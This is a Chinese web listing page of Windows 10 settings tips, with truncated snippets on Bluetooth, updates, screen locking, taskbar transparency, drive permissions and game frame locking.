本文主要为您介绍win10保护眼睛设置不改注册表,内容包括word设置的护眼色时有时无,win10系统,用的修改注册表编辑器的办,win10电脑的护眼模式怎么设置,win10护眼模式怎么取消?。Word文档底色设为护眼色步骤: 电脑桌面,右键,点击个性化。 2、点

win10

win10非让我设置苹果手机

阅读(2205)

本文主要为您介绍win10非让我设置苹果手机,内容包括win10找不到iphone手机,怎么回事,升级win10后,电脑无法识别苹果手机!已经试过网上的一些方法,都,非要用苹果电脑相应的操作系统上才能完成开发吗!?!在别的win7。远程桌面连过去报如下错误

win10

win10点蓝牙设置闪退

阅读(1750)

本文主要为您介绍win10点蓝牙设置闪退,内容包括win10打开蓝牙设置闪退,win10蓝牙故障,图标什么的都在,但是打不开蓝牙设置,打开的白,我的电脑是win8系统,蓝牙用不了,设置里一点蓝牙就闪退。1.打开设备并使其可发现。使其可发现的方式取决于

win10

win10酷狗热键设置

阅读(1844)

本文主要为您介绍win10酷狗热键设置,内容包括电脑酷狗输入法怎么设置快捷键?,电脑酷狗输入法怎么设置快捷键?,电脑上有控制音乐的键,酷狗怎么设定?。2015酷狗音乐播放器默认快捷键:播放/暂停:Alt+F5上一首:Alt+Left(左箭头)下一首:Alt+ Right(右箭

win10

win10如何设置定时唤醒

阅读(2067)

本文主要为您介绍win10如何设置定时唤醒,内容包括Win10怎么设置定时开关机休眠唤醒,Win10怎么设置定时开关机休眠唤醒,Win10进入睡眠后怎么设置自动定时唤醒。首先查看电脑的休眠功能是否开启,如果没有需要先开启计算机的休眠功能(注意是“休

win10

win10设置更新在哪

阅读(2026)

本文主要为您介绍win10设置更新在哪,内容包括win10的更新在哪里?怎么设置,win10系统如何更新,更新按钮在哪儿,win10系统更新在哪。Win10系统关闭自动更新功能步骤方法:按WIN+R打开运行,输入services.msc回车然后找到“Windowsupdata”服务

win10

win10处理器个数怎么设置

阅读(2198)

本文主要为您介绍win10处理器个数怎么设置,内容包括win10怎么开启cpu核心数,W10cpu核数怎么修改,win10在任务管理器怎么改应用程序的cpu占用数目。网络上的各种伪技巧多得很,而这个就是比较典型的。在Win7帮助文件中对于msconfig的高级引导

win10

win10如何将任务栏设置成透明

阅读(2028)

本文主要为您介绍win10如何将任务栏设置成透明,内容包括Win10任务栏怎么设置透明,win10电脑任务栏怎么变透明,win10怎么设置任务栏透明。工具:win10方法如下:首先打开操作系统,进入桌面,如下所示,可以看到操作中心和任务栏是没有透明的

win10

win10自动锁定屏幕怎么设置

阅读(3016)

本文主要为您介绍win10自动锁定屏幕怎么设置,内容包括windows10怎么设置自动锁定屏幕,Win101709如何设置自动锁定电脑屏幕,win10电脑屏幕自动锁屏怎么设置?。在Windows10系统桌面,点击桌面左下角的开始按钮,在弹出的开始菜单中点击Windows系

win10

win10设置功能键加fn

阅读(1913)

本文主要为您介绍win10设置功能键加fn,内容包括Mac装的win10怎么设置FN键,笔记本功能键FN在哪里设置啊,怎么将戴尔快捷键设置成FN+的形式?。右下角系统托盘里面,找到bootcamp控制面板。可以在里面修改。(很简单,只有一个选项,你进去一眼就能看

win10

win10怎么给d盘设置权限

阅读(1776)

本文主要为您介绍win10怎么给d盘设置权限,内容包括如何给D盘设置权限?,win10系统D盘权限问题,win10怎么设置权限。win10怎么设置权限呢!当我们局域网里有电脑需要共享的时候怎么设置权限,这个权限有写入权限要怎么操作,如下图有解析。 方法/步

win10

win10蓝牙鼠标pin设置

阅读(2353)

本文主要为您介绍win10蓝牙鼠标pin设置,内容包括win10系统笔记本如何设置无线鼠标,win10系统怎么添加蓝牙鼠标,Win10怎么添加蓝牙鼠标。有线的直接插上即可,无线的操作方法如下:在电脑Win10系统的桌面上,点击左下角的开始菜单中的“控制面板”

win10

win10设置游戏锁帧

阅读(2547)

本文主要为您介绍win10设置游戏锁帧,内容包括Win10怎么游戏锁帧?N卡用很多软件都不行,去调垂直同步又不稳定,win10锁帧60,win10LOL锁帧60。这个问题存在很长时间了,估计还是有很多人因为这个苦恼,我说一下我的解决办法,win10版本是15063版。